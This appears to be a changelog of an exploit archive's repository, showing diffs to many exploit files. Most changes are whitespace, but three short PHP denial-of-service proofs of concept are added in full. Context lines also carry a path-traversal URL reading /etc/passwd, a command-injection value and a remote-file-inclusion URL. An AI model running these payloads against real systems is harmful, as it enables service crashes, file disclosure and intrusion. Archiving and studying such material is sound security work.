DB: 2016-08-31

3 new exploits

Too many to list!

platforms/cgi/webapps/40303.sh

@@ -1,4 +1,4 @@
-            #!/bin/bash
+#!/bin/bash
 #
 #  INTELLINET IP Camera INT-L100M20N remote change admin user/password 
 #

platforms/cgi/webapps/40304.txt

@@ -1,4 +1,4 @@
-            # Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
 # Date: 28/08/2016
 # Exploit Author: Rahul Raz
 # Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00

platforms/linux/dos/2051.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+                        #!/usr/bin/env python
 #
 # redsand@blacksecurity.org
 # Sendmail 8.13.5 and below Remote Signal Handling exploit
@@ -295,3 +295,4 @@ xpl=substr(xpl,atom,len(xpl))
 """
 
 # milw0rm.com [2006-07-21]
+      

platforms/linux/local/2031.c

@@ -1,4 +1,4 @@
-/*
+            /*
  * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
  *
  * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
@@ -106,3 +106,4 @@ int main(void)
 }
 
 // milw0rm.com [2006-07-18]
+   

platforms/linux/remote/40232.py

@@ -1,4 +1,4 @@
-            #!/usr/bin/env python
+#!/usr/bin/env python
 # -*- coding, latin-1 -*- ######################################################
 #                                                                              #
 # DESCRIPTION                                                                  #

platforms/multiple/remote/2053.rb

@@ -1,4 +1,4 @@
-#!/usr/bin/ruby
+            #!/usr/bin/ruby
 #
 # cyrus-imapd pop3d exploit
 # by bannedit
@@ -85,3 +85,4 @@ system(cmd)
 sock.close
 
 # milw0rm.com [2006-07-21]
+   

platforms/php/dos/40301.php

@@ -1,4 +1,4 @@
-                                                <?php
+<?php
 #############################################################################
 ## PHP 5.0.0 domxml_open_file() Local Denial of Service
 ## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0

platforms/php/dos/40302.php

@@ -1,4 +1,4 @@
-                                    <?php
+<?php
 #############################################################################
 ## PHP 7.0 Object Cloning Local Denial of Service
 ## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0

platforms/php/dos/40305.txt

@@ -1,4 +1,4 @@
-            <?php
+<?php
 #############################################################################
 ## PHP 5.0.0 simplexml_load_file() Local Denial of Service
 ## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0

platforms/php/dos/40313.php

@@ -0,0 +1,15 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 imap_mail() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("imap")) die("You need imap extension loaded!");
+
+$str = str_repeat('A', 9999);
+imap_mail($str,'','');
+?>      

platforms/php/dos/40314.php

@@ -0,0 +1,14 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 hw_docbyanchor() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
+
+hw_docbyanchor(0,0);
+?>      

platforms/php/dos/40315.php

@@ -0,0 +1,15 @@
+                        <?php
+#############################################################################
+## PHP 5.0.0 html_doc_file() Local Denial of Service
+## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
+## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
+## Date: 26/08/2016
+## Local Denial of Service
+## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
+## http://www.black-rose.ml
+#############################################################################
+if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
+
+$str = str_repeat('A', 9999);
+html_doc_file($str);
+?>      

platforms/php/webapps/2032.pl

@@ -1,4 +1,4 @@
-#==================================================================================================
+                        #==================================================================================================
 #!/usr/bin/perl
 use IO::Socket;
 #==================================================================================================
@@ -249,3 +249,4 @@ for ($k=0;$k<=$#ARR;$k++)
 #========================================================================================================
 
 # milw0rm.com [2006-07-18]
+      

platforms/php/webapps/2035.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+                        #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
 echo "by rgod rgod@autistici.org\n";
@@ -137,3 +137,4 @@ echo "Exploit failed...";
 ?>
 
 # milw0rm.com [2006-07-18]
+      

platforms/php/webapps/2050.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+                        #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
 echo "by rgod rgod@autistici.org\r\n";
@@ -146,3 +146,4 @@ echo "exploit failed...";
 ?>
 
 # milw0rm.com [2006-07-21]
+      

platforms/php/webapps/2068.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+            #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
 echo "by rgod rgod@autistici.org\r\n";
@@ -217,3 +217,4 @@ else
 ?>
 
 # milw0rm.com [2006-07-24]
+   

platforms/php/webapps/2088.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+                        #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
 echo "by rgod rgod@autistici.org\n";
@@ -258,3 +258,4 @@ echo "----------------------------------------------------------\n";
 ?>
 
 # milw0rm.com [2006-07-30]
+      

platforms/php/webapps/2095.txt

@@ -1,4 +1,4 @@
-###########################    www.system-defacers.org         ###############
+                        ###########################    www.system-defacers.org         ###############
 #    Found By CeNGiZ-HaN cengiz-han@system-defacers.org
 #    phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
 ############################################################################
@@ -22,3 +22,4 @@
 ##############################################################################
 
 # milw0rm.com [2006-07-31]
+      

platforms/php/webapps/2096.txt

@@ -1,4 +1,4 @@
-+--------------------------------------------------------------------
+            +--------------------------------------------------------------------
 +
 + MyNewsGroups :) v. 0.6b <= Remote File Inclusion
 +
@@ -53,3 +53,4 @@ EAR.php/&cmd=ls
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-07-31]
+   

platforms/php/webapps/2098.txt

@@ -1,4 +1,4 @@
-+--------------------------------------------------------------------
+                        +--------------------------------------------------------------------
 +
 + TSEP 0.9.4.2
 +
@@ -45,3 +45,4 @@
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2100.txt

@@ -1,4 +1,4 @@
-+--------------------------------------------------------------------
+                        +--------------------------------------------------------------------
 +
 + PHPAuction 2.1 Remote File Inclusion
 +
@@ -46,3 +46,4 @@
 +-------------------------[ E O F ]----------------------------------
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2102.txt

@@ -1,4 +1,4 @@
-#=================================================================
+                        #=================================================================
 #Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
 #================================================================
 #                                                                |
@@ -36,3 +36,4 @@
 =================================================================
 
 # milw0rm.com [2006-08-01]
+      

platforms/php/webapps/2114.htm

@@ -1,4 +1,4 @@
-TinyPHPForum 3.6 Admin Maker<br>
+                        TinyPHPForum 3.6 Admin Maker<br>
 By SirDarckCat from elhacker.net
 
 <FORM method=post enctype="multipart/form-data">
@@ -17,3 +17,4 @@ document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"u
 </script>
 
 # milw0rm.com [2006-08-02]
+      

platforms/php/webapps/2116.txt

@@ -1,4 +1,4 @@
-Script: TSEP <= 0.942
+                        Script: TSEP <= 0.942
 URL:  www.tsep.info
 Discovered: beford <xbefordx gmail com>
 Comments: "register_globals" must be enabled duh.
@@ -23,3 +23,4 @@ POC:
 http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/?
 
 # milw0rm.com [2006-08-02]
+      

platforms/php/webapps/2117.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+                        #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
 echo "execution exploit\n";
@@ -306,3 +306,4 @@ else echo ("specify an action [1-4]...");
 ?>
 
 # milw0rm.com [2006-08-03]
+      

platforms/php/webapps/2118.php

@@ -1,4 +1,4 @@
-#!/usr/bin/php -q -d short_open_tag=on
+                        #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
 echo "administrative credentials disclosure exploit\n";
@@ -260,3 +260,4 @@ echo "exploit failed...";
 ?>
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/2123.txt

@@ -1,4 +1,4 @@
-SQLiteWebAdmin
+                        SQLiteWebAdmin
 http://sourceforge.net/projects/sqlitewebadmin
 
 SQLiteWebAdmin is a simple PHP program for administrating
@@ -19,3 +19,4 @@ SirDarckCat
 elhacker.net
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/2128.txt

@@ -1,4 +1,4 @@
-$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
+                        $$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
 $$
 $$  SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
 $$  Script site: http://sapid.sourceforge.net/
@@ -28,3 +28,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root
 #Pozdro dla wszystkich ;-)
 
 # milw0rm.com [2006-08-07]
+      

platforms/php/webapps/37389.txt

@@ -1,4 +1,4 @@
-# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
+            # Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
 # Google Dork:
 # Date: 25/06/2015
 # Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
@@ -115,3 +115,4 @@ The attacker can now log as superlibrarian.
 Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
 Alice needs to have access to the OPAC interface and to have permissions to create public lists.
 
+   

platforms/php/webapps/40300.py

@@ -1,4 +1,4 @@
-                        '''
+'''
 # Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
 # Google Dork: intext:"Help Desk Software by HelpDeskZ"
 # Date: 2016-08-26

platforms/php/webapps/6733.txt

@@ -16,3 +16,4 @@ http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
 http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
 
 # milw0rm.com [2008-10-12]
+      

platforms/windows/dos/2039.pl

@@ -1,4 +1,4 @@
-#!/usr/bin/perl
+                        #!/usr/bin/perl
 # Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
 # ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
 #
@@ -36,3 +36,4 @@ do
 } while (true);
 
 # milw0rm.com [2006-07-20]
+      

platforms/windows/dos/40298.py

@@ -1,4 +1,4 @@
-            """
+"""
 # Exploit Title: Goron Web Server 2.0 - Multiple Vulnerabilities
 # Date: 26/08/2016
 # Exploit Author: Guillaume Kaddouch

platforms/windows/local/2094.c

@@ -1,4 +1,4 @@
-/*
+                        /*
 
 by Luigi Auriemma
 
@@ -272,3 +272,4 @@ void std_err(void) {
 }
 
 // milw0rm.com [2006-07-31]
+